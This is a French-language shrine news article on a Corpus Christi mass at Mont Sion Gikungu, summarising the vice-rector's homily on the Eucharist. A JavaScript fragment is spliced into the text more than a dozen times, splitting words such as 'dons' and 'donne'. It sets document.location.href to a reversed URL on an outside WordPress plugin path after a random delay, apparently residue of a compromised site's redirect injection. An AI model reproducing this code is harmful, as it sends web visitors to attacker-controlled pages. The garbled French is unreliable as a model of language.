La solennité du Saint Sacrement, très Saints Corps et Sang du Christ, a été célébrée Dimanche le 19 juin 2022 dans la messe de 10 heures. Au Sanctuaire Marial de Schoenstatt de Mont Sion Gikungu, les cérémonies de la solennité étaient agrémentées par le tambour royal et la danse des danseurs intore.  La messe de la solennité a été célébrée par Père Floribert KANEZA, Vice-Recteur du sanctuaire, comme célébrant principal entouré d’autres prêtres. Dans son mot d’accueil aux Pèlerins venus très nombreux, Père Floribert a d’abord souhaité bonne fête du Saint Sacrement aux pèlerins et a fait savoir que nous glorifions le Corps et le Sang de Jésus Christ en méditant que Jésus Christ est vivant dans l’Eucharistie. C’est Emmanuel, Dieu parmi nous. Et de continuer que ce jour Jésus quitte le Tabernacle pour se promener tout en bénissant les gens comme Il le faisait avant.  Nous devons alors nous préparer pour lui montrer nos familles, nos habitations, tout ce que nous possétoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons et Il va nous bénir.  Le Père KANEZA a alors fait savoir que l’Eucharistie c’est la bénédiction et que nous sommes appelés à être reconnaissant. Les saintes écritures étaient : Première lecture : Gn 14, 18-20 ; le psaume responsorial, Ps 110, 1.2.3.4 ; deuxième lecture : 1 Co 11, 23-26 suivie de la séquence, et l’Évangile de Jésus Christ selon saint Luc Lc 9, 11b-17.

Homélie

Dans son homélie, le célébrant de la messe a encore une fois souhaité joyeuse fête aux Chrétiens. C’est un grand jour où nous célébrons le Saint Corps, le Saint Sang, l’Esprit et la Divinité de Jésus. C’est un très grand cadeau que Dieu a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à l’Eglise, un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don qui nous unit tous puisque nous communions au même Corps et au même Sang du Christ, et qui nous fait aussi entrer dans l’unité avec Dieu. C’est de la bonne nouvelle de Dieu.  L’Eucharistie est le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don le plus grand de tous les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons; en Eucharistie nous recevons la vie en plénitude: le salut éternel, la miséricorde divine, la grâce, la joie, la paix, et beaucoup d’autres biens, a fait remarquer le Père Floribert.  Dieu nous a tellement aimés qu’Il a voulu vivre avec les hommes; l’Eucharistie est alors Dieu parmi les hommes; c’est Emmanuel, Dieu parmi nous même s’Il est au Ciel. Après son ascension, pour des gens de simple pensée, c’était comme s’Il nous a abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés, mais Il continue à vivre avec nous dans la Sainte Eucharistie. C’est pourquoi pour nous l’Eucharistie est la source de notre vie chrétienne, a-t-il insisté.

Nous méditons beaucoup sur cette dimension dans les saintes Écritures d’aujourd’hui, a continué le vice-recteur. Les lectures d’aujourd’hui nous invitent à méditer sur Jésus vivant dans le Saint Sacrement.  Dans la première lecture, nous voyons comment Melchissédec, le prêtre et roi d’Israël, c’est-à-dire le roi de la paix, va recevoir Abraham qui revenait de la guerre avec ceux qui avaient enlevé Lot son neveu, et dans action de grâce il a offert le pain et le vin, qui sont devenus les signes que Jésus a utilisés pour nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner la Sainte Eucharistie. Melchissédec est alors dans la place de Jésus, Roi de la paix, Prêtre et Dieu qui trône au ciel. Dans son action de grâce, il a béni Abraham et a glorifié Dieu en offrant le Pain et le Vin. C’est l’offrande d’action de grâce, l’offrande de Jésus Christ, c’est son Corps et son Sang qui font le Saint Sacrement qui est l’Eucharistie et qui signifie « Rendre Grace à Dieu ». Jésus a offert son Corps et son Sang en rendant grâce à Dieu. Alors chaque fois que nous célébrons l’Eucharistie, c’est une belle occasion de rendre grâce à Dieu pour beaucoup de biens que Dieu ne cesse de nous combler en passant par son Fils Jésus Christ vivant dans le Saint Sacrement, a-t-il expliqué. 

Dans la deuxième lecture, nous ententoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons Saint Paul nous dire ce qui s’est passé dans la nuit de Pâques, la nuit de Jeudi Saint quand Jésus fut arrêté, il insiste particulièrement sur l’acte de sacrifice de Jésus Christ quand Il dit : « Ceci est mon corps, qui est rompu pour vous ; faites ceci en mémoire de moi ». 1 Co 11, 24 ; « Cette coupe est la nouvelle alliance en mon sang ». 1Co11,25, pour rappeler l’action et les mots de Jésus Christ afin de corriger et conseiller les Corinthiens qui se comportaient très mal dans leur rencontre pour célébrer ce Sacrement. Ils se mettaient dans des groupes différents selon les moyens et certains s’enivraient et mangeaient, et se disaient célébrer l’Eucharistie et les autres rentraient affamés. Ils n’avaient pas encore compris que l’Eucharistie c’est un sacrement qui unifie les gens. Paul leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne ce conseil tout en nous faisant un clin d’œil aussi.  Chaque fois que nous célébrons l’Eucharistie, quand nous mangeons le Corps et buvons le Sang de Jésus Christ, nous célébrons la mort et la résurrection de notre Seigneur jusqu’à son retour. L’Eucharistie est liée à la mort du Christ. Et comme Jésus nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés l’Eucharistie en acceptant de mourir, nous aussi nous devons recevoir l’Eucharistie en acceptant de mourir dans notre personne ancienne, esclave du mal, pour nous revêtir la personne nouvelle qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la vie en Jésus Christ vivant dans l’Eucharistie. Si tu n’acceptes pas la mort de Jésus et ta propre mort pour tuer le virus qui nous empêche à recevoir Jésus convenablement c’est difficile de recevoir la vie et c’est bien dit : les bons Le reçoivent et les mauvais Le reçoivent aussi mais la fin n’est pas la même, a-t-il lancé.

 Dans l’évangile nous avons entendu ce miracle que Jésus fait en nourrissant 5 000 hommes sans inclure les femmes et les enfants avec seulement cinq pains et deux poissons, tout le monde mange à satiété et on rassemble 12 paniers de restes. Ceci rappelle que l’Eucharistie est la nourriture du cœur pour des multitudes qui se rapprochent de Jésus Christ. Ce miracle nous montre aussi sa relation avec l’Eucharistie, puisque les mots que Jésus utilise en multipliant les pains sont les mêmes qu’il a utilisé en instituant l’Eucharistie : « Jésus prit les cinq pains et les deux poissons, et, levant les yeux au ciel, il prononça la bénédiction sur eux, les rompit et les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donna à ses disciples pour qu’ils les distribuent à la foule » Lc 9, 16. Il fit la même chose le Jeudi Saint. Et ce sont les mêmes paroles que le prêtre utilise pour le pain et le vin qui change en Corps et Sang de Jésus Christ.  Ici Saint Luc nous montre aussi la part très importante des disciples, dans leur petite contribution de cinq pains et deux poissons. Ils ne les ont pas gardés peut-être pour leur dîner.  Jésus nous appelle à partager le peu que nous avons. L’Eucharistie est le symbole qui nous rappelle que nous partageons le Corps et le Sang de Jésus Christ. Amène à Jésus même le peu, Il va les bénir, et ce sera utile pour des milliers. Il nous faut une solidarité dans le peu que nous avons. Il faut être solidaire, puisque nous sommes les membres d’un seul corps de Jésus Christ. Nous devons vivre dans l’unité, nous formons une seule famille, le Corps de Jésus Christ. Soyons alors ceux qui apportent Jésus aux autres, chez les affamés, les sinistres, a-t- conclu.

Il a terminé son homélie en exhortant les chrétiens à suivre le modèle de la Vierge Marie, elle qui a été le premier tabernacle de Jésus Christ et qui a apporté à Elizabeth et Zacharie Jésus le Sauveur. Apportons alors toujours Jésus chez les autres, pour qu’Il leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne son amour, afin que pour toujours Jésus Christ soit glorifié. Amen !

Signalons que la messe a été suivie par l’Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration du Saint Sacrement, un petit moment de recueillement suivi d’une procession du Saint Sacrement en dehors de Mont Sion.